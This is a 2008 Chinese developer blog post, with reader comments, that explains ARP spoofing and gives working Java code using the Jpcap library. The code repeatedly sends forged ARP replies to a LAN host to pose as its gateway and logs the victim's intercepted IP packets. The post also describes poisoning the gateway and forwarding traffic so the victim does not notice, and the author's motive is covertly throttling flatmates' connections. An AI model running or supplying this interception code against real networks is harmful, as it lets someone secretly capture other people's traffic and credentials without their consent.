Rexcj

做牛B的事,让傻B们说去吧。

使用JAVA通过ARP欺骗实现数据封包监听

        如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些P2P工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说,那简直就是痛不欲生。绝对不能再忍了,于是乎上网下载P2P终结者,哼,你们不仁我则不义,看谁厉害。软件下好后,立刻启动监控,然后尝试了下速度,哇,那个爽啊。可惜好景不长,没多久对方就跑来问我为什么他们断网了?我楞了一下,那垃圾软件居然连对方的网都断了,于是支支唔唔的应付了他,说我看下,总算勉强过关,还好他们不懂电脑,不然就掉大了(貌视挺卑鄙的,别BS俺,俺也是迫不得已)。

       没办法,那破烂软件居然连人家网都断了,我仅仅只是想给他们限速而已(还算有点良心),仔细查看了下文档,使用的方式都没问题啊,为什么会这样呢?想了半天也毫无头绪,没办法,看来只能自己动手了,于是乎上网找了些关于这方面的资料看了下,也写了一点代码做试验,由于时间有限也只写了一点,不过总体的做法大概是有所了解,在这里就写一篇文章大概记录一下自己的做法,以便作为日记又可与大众分享下。

       其实目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下。

       ARPAddress Resolution Protocol)既地址解释协议,主要的目的是用于进行IPMAC地址解释的。IP是网络层协议,而MAC是被数据链路层使用。网络中两个节点要进行通信,那么首先发送端必须要知道源和目的地的MAC地址,而网络层是使用IP地址,所以要获得MAC地址,就必须通过IP地址获取对应的MAC地址,这样就需要使用ARP协议将IP地址转换为MAC地址,而同时为了能够快速的找到目的地的MAC地址,每个节点都会有一个ARP缓存,用于保存已经转好好的MAC地址,大家可以在控制台下使用arp –a指令查看arp缓存表。

       ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中是否存在对应的IP地址,如果没有,则发送一个ARP广播,当某一个拥有这个MAC地址的节点收到ARP请求的时候,会创建一个ARP reply包,并发送到ARP请求的源节点,ARP Reply包中就包含了目的地节点的MAC地址,在源节点接受到这个reply后,会将目的地节点的MAC地址保存在ARP缓存表中,下一次再次请求同一IP地址的时候,系统将会从ARP表中直接获取目的地MAC地址,而不需要再次发送ARP广播。

       看到这里,ARP的具体过程大概讲解了一遍,希望能够解释清楚。相信有心的朋友一定已经开始考虑ARP欺骗的原理了吧,其实就是利用ARP表进行ARP欺骗,比如一台局域网内的机器A,通过网关B进行internet连接,而它的arp表中保存着网关BIPMAC地址对,如下:

192.168.1.1    >    MAC1(懒得写那么长了,就以MAC1作为MAC地址了)

那么也就是说,当A想上网的时候,他所有的数据都将先发送到网关再由网关转发出去,那么A的数据首先会通过192.168.1.1找到网关的MAC地址MAC1,然后就可把数据发送到网关了。此时你的机器是CMAC地址是MAC2,你想通过ARP欺骗来获取A传输的数据,那么你所需要做的事情其实很简单,就是将机器AARP表中192.168.1.1对应的MAC地址MAC1改成MAC2即可,这样子机器A所有发送到192.168.1.1的数据就会发到MAC地址为MAC2的机器上,也就是你的机器上了。

要更改APR表的记录,办法就是伪造一个ARP reply包发送给机器A,而这个ARP reply包中的源IP192.168.1.1MAC地址为MAC2既你的机器的MAC地址即可,机器A接受到后就会将这个源IPMAC刷新到它的ARP缓存表中,覆盖原有的记录,最终这样就可以达到ARP欺骗的目的了。

讲到这里不知道大家是否对ARP欺骗有所了解呢?如果再不了解那就上网搜搜吧,网上很多相关的资料。好了,原理讲完了,那就轮到实现了,通过JAVA又如何实现ARP欺骗呢?

从头到尾来做,当然不是我的作风,JAVA社区那么庞大,我么应该好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一个开源项目JPCAP,这个项目提供一个中间层接口让使用者可以调用如wincap/libpcap这些库对网络传输进行控制,具体可到官方网站查看其文档。

在这里,我实现了一个简单的封包截取程序,根据ARP欺骗的原理,我们所需要做的事情如下:

1、 构建一个ARP Reply

2、 将该封包发送到需要欺骗的机器

代码如下:

public class LocalListener {

    
private final static String GATE_IP = "192.168.11.1";
  
private final static byte[] GATE_MAC = {0x000x0a, (byte0xc50x420x6e, (byte0x9a};
    
private JpcapCaptor jpcap;                                        //与设备的连接
    private JpcapSender sender;                                     //用于发送的实例
    private Packet replyPacket;                                      //ARP reply包
    private NetworkInterface device;                           //当前机器网卡设备
   
private IpMacMap targetIpMacMap;                        //目的地IP MAC对

    
public LocalListener(IpMacMap target) throws Exception {
        NetworkInterface[] devices 
= JpcapCaptor.getDeviceList();               device = devices[1];
        
this.targetIpMacMap = target;
        initSender();
        initPacket();
    }


    
private void initSender() throws Exception {
        jpcap 
= JpcapCaptor.openDevice(device, 2000false10000);    //打开与设备的连接
        jpcap.setFilter("ip"true);                                //只监听ip数据包
        sender = jpcap.getJpcapSenderInstance();
    }


    
private void initPacket() throws Exception {
       
//reply包的源IP和MAC地址,此IP-MAC对将会被映射到ARP表
        IpMacMap targetsSd = new IpMacMap(GATE_IP, device.mac_address);  
        
//创建修改目标机器ARP的包
        replyPacket = ARPPacketGern.genPacket(targetIpMacMap, targetsSd); 
        
//创建以太网头信息,并打包进reply包
        replyPacket.datalink = EthernetPacketGern.genPacket(targetIpMacMap.getMac(),
                device.mac_address);
    }


    
public void listen() throws InterruptedException{
        Thread t 
= new Thread(new Runnable() {
            
public void run() {
             
//发送reply封包,修改目的地arp表, arp表会在一段时间内被更新,所以需要不停发送
                while(true){
                    send();  
                    
try {
                        Thread.sleep(
500);
                    }
 catch (InterruptedException ex) {
                        Logger.getLogger(LocalListener.
class.getName()).log(Level.SEVERE, null, ex);
                    }

                }

            }

        }
);
        t.start();
        
//截获当前网络设备的封包收发信息
        while(true){
            IPPacket ipPacket 
= (IPPacket)jpcap.getPacket();
            System.out.println(ipPacket);
        }

    }
}



//IP-MAC实体,只用于保存一对IP-MAC地址
public class IpMacMap {
    
private String ip;
    
private byte[] mac;

    
public IpMacMap(){
    }

    
    
public IpMacMap(String ip, byte[] mac){
        
this.ip = ip;
        
this.mac = mac;
    }

    
    
public String getIp() {
        
return ip;
    }


    
public void setIp(String ip) {
        
this.ip = ip;
    }


    
public byte[] getMac() {
        
return mac;
    }


    
public void setMac(byte[] mac) {
        
this.mac = mac;
    }
   
    
}


//ARP reply包生成类,用于根据目的地址和源地址生成reply包
public class ARPPacketGern{

    
public static ARPPacket genPacket(IpMacMap target, IpMacMap sender) throws Exception{
        ARPPacket arpTarget 
= new ARPPacket();
        arpTarget.hardtype 
= ARPPacket.HARDTYPE_ETHER;  //选择以太网类型(Ethernet)
        arpTarget.prototype = ARPPacket.PROTOTYPE_IP;         //选择IP网络协议类型
        arpTarget.operation = ARPPacket.ARP_REPLY;              //选择REPLY类型
        arpTarget.hlen = 6;                              //MAC地址长度固定6个字节
        arpTarget.plen = 4;                              //IP地址长度固定4个字节
        arpTarget.target_hardaddr = target.getMac();
        arpTarget.target_protoaddr 
= InetAddress.getByName(target.getIp()).getAddress();
        arpTarget.sender_hardaddr 
= sender.getMac();
        arpTarget.sender_protoaddr 
= InetAddress.getByName(sender.getIp()).getAddress();
        
return arpTarget;
    }

}






//根据目的地MAC和源MAC构建以太网头信息,用于传输数据
public class EthernetPacketGern{
    
public static EthernetPacket genPacket(byte[] targetMac, byte[] senderMac) throws Exception {
        EthernetPacket ethToTarget 
= new EthernetPacket();           //创建一个以太网头
        ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;   //选择以太包类型
        ethToTarget.dst_mac = targetMac;
        ethToTarget.src_mac 
= senderMac;        
        
return ethToTarget;
    }

}



 

    如上代码实现了创建一个发送到IP192.168.11.4的机器的ARP reply封包,其中可看到,reply包中的源IP192.168.11.1,而源MAC则被改成当前机器的MAC地址,既device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新ARP表,并且所有发送往192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中创建了一个线程用于循环发送reply封包,主要是因为ARP表会在一定时间内更新,所以要不停的发送才能保证其MAC地址时刻都是被改变的。同时主线程用于监听并打印当前设备的所有IP数据包信息,本来此方法只能监听到本机数据包的信息,但由于使用了ARP欺骗,所以你会在192.168.11.4发送数据到192.168.11.1的时候截获其数据包,并看到类似如下的信息:

1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > 8016 seq(1062321893) win(65535) S

    其实上例程序虽然可以截获并监听192.168.11.4的数据包,但是如果真的运行起来后,192.168.11.4的机器将会无法上网(假设该机器通过192.168.11.1作为网关上网),这又是为何呢?

    这就是因为本机截获了192.168.11.4的封包,但是却没有将封包转发出去,所以实际上数据包到了你的机器上后就被中断了,数据包无法发送出去。既然要监听对方机器,当然不能让对方知道啦,如果你监听了那台机器,却导致对方无法上网,傻子也知道有问题啦,所以以上程序仍然要加个补充,那就是将封包数据在转发到192.168.11.1上,只要将截获的封包再send出去就可以了,具体如何做就留给大家想吧,困了,休息了,如果有朋友有兴趣又实在想不出如何做的话,可以向我提出来,有必要的话,下次再贴一个完整点的例子吧。

    对了,最后还有补充的地方,那就是我们可以通过同样的方式刷新网关的ARP,这样网关接受到的数据也会被本机截获,同样再通过本机转发到目的机器即可。这样对方既可正常上网,而我们又可截获对方的数据包,如果要进行限速的话,那就是在截获封包的同时,进行一定的延时,比如一秒只允许多少K的数据通过,都可以在这里做手脚,同样的,具体如何留给大家想吧,^ o ^



posted on 2008-07-23 16:05 Rexcj 阅读(4896) 评论(12)  编辑  收藏

Feedback

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 16:56 残梦追月

呵呵,让我打开眼界了啊!  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 16:56 残梦追月

先订阅啦!  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 17:26 隔叶黄莺

楼主真的太不义了,ARP本来就是常常用来骗取密码的,不过现在敏敢性的口令,QQ,如银行的都会加密,你大约是不知道的。但是像邮箱登录密码名和密码岂不让你全窥了去,再根据普通人使用密码的习惯,银行的密码怕是也能猜得出几分来。
局域网对于这种ARP欺骗的病毒可是深恶痛绝,中毒者上网上得其乐融融,却害死了一大片,关键那病毒还可能把截取到的敏敢信息发了出去。  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 17:44 Rexcj

我对于数据的窃取倒没什么兴趣,对于这篇文章只是纯粹站在技术性的角度上考虑,我开始的目的也仅仅是为了限制其他人的速度,没办法,我对BT这类P2P工具是深恶痛绝,技术不分善恶,善恶只在于人心,况且了解技术的原理对于防范是很有好处的,如果有时间我仍然会继续研究其他的网络协议,但也纯粹是基于兴趣。  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 17:48 Jarod.cn.LuLuLife

很好,支持一个  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 18:11 yz

很好,支持一个,期待下文,以及代码,谢谢  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 18:22 隔叶黄莺

现在能说得上 OSI 的七层模型的已不多,其中还有些是硬背下来的,根本没理解各层的职责。从高层应用做协议相关的开发,听说过 DoD 的四层模型的应该也不多。  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 20:26 Always BaNg.

强悍阿,争取搞一个免费软件出来我们用用:)  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听[未登录] 2008-07-23 22:10 火焰出林

不错,楼主可以加QQ吗,以后多交流,我QQ:20481378  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 23:09 隔叶黄莺

这个要系统里安装了wincap/libpcap,分别对应的是 Windows和 Unix族(包括Linux)系统,然后还要下载开源的 jpcap,在 sourceforge 上有,可惜现在大多数人是上不了的,期待奥运后重新开放--其实是有赖于 NotePad++ 行事了。

wincap 是要用 setup 安装的,光几个动态库还不行,就是说要注册动态库的。jpcap 其实是 jni 的实现,它为两种常用的平台分别提供了 .dll 文件和 .so 文件。

不知我说的对不,我原来试图用过一下 jpcap,但后来实际没这么去用。如果是网络协议,下到更低一层去,C++ 会是更好的选择,因为 C++ 有可用的类库为更底层的协议数据报定义了相应的数据结构,使用起来更方便些。

但是,一般 wincap/libpcap 这个东西恐怕还是免不了的,不然就会有更多单调的事情要做的。原来做网络管理软件,现在也感觉很生疏了。  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-23 23:24 Rexcj

隔叶黄莺 说的不错,你对这些比我了解多了,我纯粹是个业余水平,呵呵。

我在文章前面也说了,jpcap实际上只是提供了一层接口,具体的底层实现仍然是依靠wincap/libpcap的,只有这样,jpcap才能在多个系统下使用,目前有很多系统都提供了支持,具体哪些我就不记得了。

至于说到底层开发所使用的语言,那当然是C/C++更适合,JAVA毕竟运行在虚拟机上,不如C/C++来的直接和方便,当然不同系统也不得不写不同的实现。  回复  更多评论   

# re: 使用JAVA通过ARP欺骗实现数据封包监听 2008-07-30 11:48 代理163

大开眼界!  回复  更多评论   



只有注册用户登录后才能发表评论。


网站导航:
 

My Links

Blog Stats

常用链接

留言簿(1)

随笔档案

搜索

积分与排名

最新评论

阅读排行榜

评论排行榜